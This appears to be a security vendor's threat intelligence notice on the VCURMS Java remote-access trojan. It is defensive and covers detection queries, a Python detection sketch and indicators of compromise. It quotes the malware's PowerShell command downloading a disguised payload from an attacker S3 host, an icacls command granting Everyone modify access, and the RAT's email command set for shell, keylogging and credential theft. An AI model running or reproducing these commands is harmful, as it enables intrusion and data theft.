Threat Analysis Unit - Threat Intelligence Notification
Title: VCURMS RAT
Summary
A malicious Java downloader was recently found in a phishing campaign propagating the new VCURMS RAT. Throughout the campaign, the attacker uses email as the command-and-control channel. To extend the RAT's capabilities, it also deploys a keylogger and a credential stealer.
Behavioral Summary
When executed, it first copies itself to “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup” under the name “MyStartupProgram.jar”, as shown in Figure 1 below:
Figure 1. Main function code
It then downloads a Java Runtime Environment (JRE) as a zip file to “C:\Users\username\AppData\cookie\jre\jre.zip” using the following PowerShell command. Once unzipped, this JRE is used to execute the subsequent Java payloads:
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/jre.jpg', 'C:\Users\username\AppData\cookie\jre\jre.zip')"
The malware also runs icacls to modify file-system permissions. The following command grants Everyone modify access to the .oracle_jre_usage folder, inheritable by its files and subfolders:
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
VCURMS uses an email API as its C2 channel to receive commands and exfiltrate data. Its first check-in is an email containing the text "Hey master, I'm online". It then periodically runs the CheckInboxTask() function, shown in Figure 2 below, to check the inbox for commands and tasks delivered as emails.
Figure 2. Email enumeration for commands
The VCURMS RAT supports the commands listed below, which are executed on the compromised machine.
Command | Description
get information | Retrieve system details such as the operating system, RAM size, computer name, volume ID, user name, user country, and the files in the Documents and Desktop folders.
shell | Execute the command specified in the email and send the result back by email.
recovery | Download the stealer JAR from hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/stl2.jpg, save it as \AppData\cookie\st.jar and execute it.
start keylogger | Download the keylogger JAR from hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/kl.jpg, save it as \AppData\cookie\klog.jar and execute it.
get keylogger | Send the captured keystrokes stored at \AppData\cookie\klogs.txt as an email attachment.
upload | Send the file specified in the command as a compressed email attachment.
download | Download additional payloads attached to the email with a .jpg extension.
search | Search the system for files matching a given keyword and send the list to the attacker by email.
Table 1. List of commands supported by VCURMS RAT
The process tree of VCURMS RAT is shown in Figure 3 below:
Figure 3. Process Tree
Customer Protection
VMware Carbon Black Endpoint Standard (CB Defense)
The recommended policy, at a minimum, is to block all types of malware (Known, Suspect, and PUP) from executing and to delay execution for cloud scan, so as to get the maximum benefit from the VMware Carbon Black Cloud reputation service.
Sensors running version 3.8 or greater have Core Prevention rules that block TTPs often used by threat actors, such as Advanced Scripting Prevention, Credential Theft, and Privilege Escalation protection.
In addition, the following policy will prevent this style of attack from being executed:
Process | Operation Attempt | Action
Applications at Path: **\cookie\jre\java*.exe | Communicates over the network; Invokes a command interpreter | Deny operation
As always, our best practice recommendation is to deploy this rule to a small subset of sensors, assess, then define permissions to reduce any false positives. After confirming no false positives in your environment, deploy across additional groups.
VMware Carbon Black App Control (CB Protection)
The most effective way of blocking this malware is to run App Control in High or Medium enforcement. Customers in Low enforcement can additionally enable the following Rapid Configs as a further layer of protection, to prevent and alert on malware that executes during the different phases of an attack:
- Browser Protection
- Microsoft Office Protection
- PowerShell Protection
- Ransomware Protection
- Reconnaissance and Exfiltration Protection
- Suspicious Command Line Protection
- Suspicious Application Protection
- WMI Protection
Implementation: As always, our best-practice recommendation is to create all custom rules in “Report” mode first, assess for false positives, and create any higher ranking execute allow rules to prevent legitimate blocks. After confirming no false positives in your environment, you can then change to Block.
Customer Action: Ban known hashes from the IOC in the environment
VMware Carbon Black EDR and Cloud Enterprise EDR
The PSC Threat Feeds will detect the known hashes for this malware. Customers can also ban the known hashes, which are listed in the IOC section of this report.
Many existing queries that are in the MITRE ATT&CK, SANS, CB Endpoint Visibility, and CB Advanced Threat feeds will also alert on characteristics associated with these families.
Name: Defense Evasion - Permission Modifications - icacls/cacls/takeown
Query:
VMware Carbon Black EDR:
(process_name:takeown.exe OR process_name:icacls.exe OR process_name:cacls.exe) -cmdline:ProgramData\Intel\Wireless -cmdline:AppData\Roaming\Adobe\UPI\* -cmdline:ProgramData\Lenovo\SystemUpdate\* -cmdline:ProgramData\Lenovo\ImController\*
Cloud Enterprise EDR:
((process_name:takeown.exe OR process_name:icacls.exe OR process_name:cacls.exe) -process_cmdline:ProgramData\\Intel\\Wireless -process_cmdline:AppData\\Roaming\\Adobe\\UPI\* -process_cmdline:ProgramData\\Lenovo\\SystemUpdate\* -process_cmdline:ProgramData\\Lenovo\\ImController\*) -enriched:true

Name: Execution - AMSI - PowerShell Downloading Behaviors Detected
Query:
VMware Carbon Black EDR:
(fileless_scriptload_cmdline:.downloadfile OR fileless_scriptload_cmdline:.downloaddata OR fileless_scriptload_cmdline:.downloadstring) AND -(fileless_scriptload_cmdline:chocolatey.org*)
Cloud Enterprise EDR:
(fileless_scriptload_cmdline:.downloadfile OR fileless_scriptload_cmdline:.downloaddata OR fileless_scriptload_cmdline:.downloadstring OR scriptload_content:.downloadfile OR scriptload_content:.downloaddata OR scriptload_content:.downloadstring) AND NOT (fileless_scriptload_cmdline:chocolatey.org* OR scriptload_content:chocolatey.org*)

Name: Execution - Command-Line Interface (Cmd.Exe /C)
Query:
VMware Carbon Black EDR:
((process_name:cmd.exe and cmdline:/c) and -childproc_name:facefoduninstaller.exe)
Cloud Enterprise EDR:
(((process_name:cmd.exe AND process_cmdline:\/c) AND -childproc_name:facefoduninstaller.exe)) -enriched:true
Implementation: As always, our best-practice recommendation is to tune out any false positives before creating new watchlists.
Customer Action: Test and deploy the watchlist and ban the known hash values. For any hits, investigate the file modifications, network connections, cross-process injection(s) and child processes.
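The following is an added illustration, not part of the original notification or of any Carbon Black product: it expresses the conditions behind the CB Defense policy rule (Java running from **\cookie\jre\ and invoking a command interpreter) and the icacls and PowerShell-download watchlist queries above as plain detection logic, and runs it over constructed process events. The event fields, exclusion list and function names are assumptions made for this example.

```python
import re

# Constructed sample process events (not real telemetry); the URL, paths and
# icacls command mirror the behaviour described in this notification.
SAMPLE_EVENTS = [
    {"process": "powershell.exe",
     "cmdline": "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
                "'hxxps://riseappbucket.s3.ap-southeast-1.amazonaws.com/jre.jpg', "
                "'C:\\Users\\username\\AppData\\cookie\\jre\\jre.zip')\""},
    {"process": "icacls.exe",
     "cmdline": "C:\\Windows\\system32\\icacls.exe C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage "
                "/grant \"everyone\":(OI)(CI)M"},
    {"process": "java.exe", "path": "C:\\Users\\username\\AppData\\cookie\\jre\\bin\\java.exe",
     "cmdline": "java.exe -jar C:\\Users\\username\\AppData\\cookie\\st.jar", "child": "cmd.exe"},
    # Benign: vendor path that the page's icacls watchlist query excludes.
    {"process": "icacls.exe",
     "cmdline": "icacls.exe C:\\ProgramData\\Lenovo\\SystemUpdate\\tmp /grant \"everyone\":(OI)(CI)M"},
    # Benign: Java started from its normal install location.
    {"process": "java.exe", "path": "C:\\Program Files\\Java\\jre\\bin\\java.exe",
     "cmdline": "java.exe -jar app.jar", "child": "cmd.exe"},
]

# PowerShell download whose source has an image extension but lands as a .zip/.jar.
DOWNLOAD_RE = re.compile(
    r"\.download(file|string|data)\(\s*'[^']+\.(jpe?g|png|gif)'\s*,\s*'[^']+\.(zip|jar)'", re.I)
ACL_RE = re.compile(r'/grant\s+"?everyone"?:\(OI\)\(CI\)', re.I)  # inheritable grant to Everyone
# Tuning exclusions taken from the watchlist query above (lower-cased for matching).
ACL_EXCLUDE = ("programdata\\intel\\wireless", "appdata\\roaming\\adobe\\upi",
               "programdata\\lenovo\\systemupdate", "programdata\\lenovo\\imcontroller")

def classify(event):
    """Return the names of the detections that fire for one process event."""
    hits = []
    name, cmd, path = (event.get(k, "").lower() for k in ("process", "cmdline", "path"))
    if name == "powershell.exe" and DOWNLOAD_RE.search(cmd):
        hits.append("disguised_download")
    if name in ("icacls.exe", "cacls.exe", "takeown.exe") and ACL_RE.search(cmd) \
            and not any(ex in cmd for ex in ACL_EXCLUDE):
        hits.append("everyone_acl_grant")
    base = path.rsplit("\\", 1)[-1]
    if "\\cookie\\jre\\" in path and base.startswith("java") and base.endswith(".exe"):
        hits.append("java_from_cookie_jre")  # the **\cookie\jre\java*.exe policy rule
        if event.get("child", "").lower() in ("cmd.exe", "powershell.exe"):
            hits.append("cookie_jre_spawns_shell")  # "Invokes a command interpreter"
    return hits

def scan(events):
    """Run classify over a list of events; returns (index, detection) pairs."""
    return [(i, h) for i, e in enumerate(events) for h in classify(e)]
```

Only the three events modelled on the notification fire; the Lenovo icacls call is suppressed by the same exclusion the watchlist query carries, and Java from its normal install path is ignored.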
MITRE ATT&CK TIDs
TID | Tactic | Description
T1204.002 | Execution | User Execution: Malicious File
T1059.003 | Execution | Command and Scripting Interpreter
T1614 | Discovery | System Location Discovery
T1083 | Discovery | File and Directory Discovery
T1005 | Collection | Data from Local System
T1056.001 | Collection | Input Capture: Keylogging
T1555.003 | Credential Access | Credentials from Password Stores: Credentials from Web Browsers
T1140 | Defense Evasion | Deobfuscate/Decode Files or Information
T1222.001 | Defense Evasion | File and Directory Permissions Modification
T1071 | Command and Control | Application Layer Protocol: Mail Protocols
T1105 | Command and Control | Ingress Tool Transfer
Table 2. MITRE ATT&CK TIDs
Indicators of Compromise (IOCs)
Indicator | Type | Context
588d6f6feefa6273c87a3f8a15e2089ee3a063d19e6a472ffc0249298a72392d | SHA256 | VCURMS RAT (Windows.jar)
2cc7ad706df895cf88048d9303e8b3bcc2e74f1b | SHA1 | VCURMS RAT (Windows.jar)
39a6f4c34b2309c2f99f6859ed7dec29 | MD5 | VCURMS RAT (Windows.jar)
Table 3. Indicators of compromise
About TAU-TIN
TAU-TIN (Threat Analysis Unit - Threat Intelligence Notification) is a report by Carbon Black's TAU (Threat Analysis Unit) to help customers detect and prevent emerging threats.
To receive future notifications, navigate to the TAU-TIN label on UeX and then click Subscribe.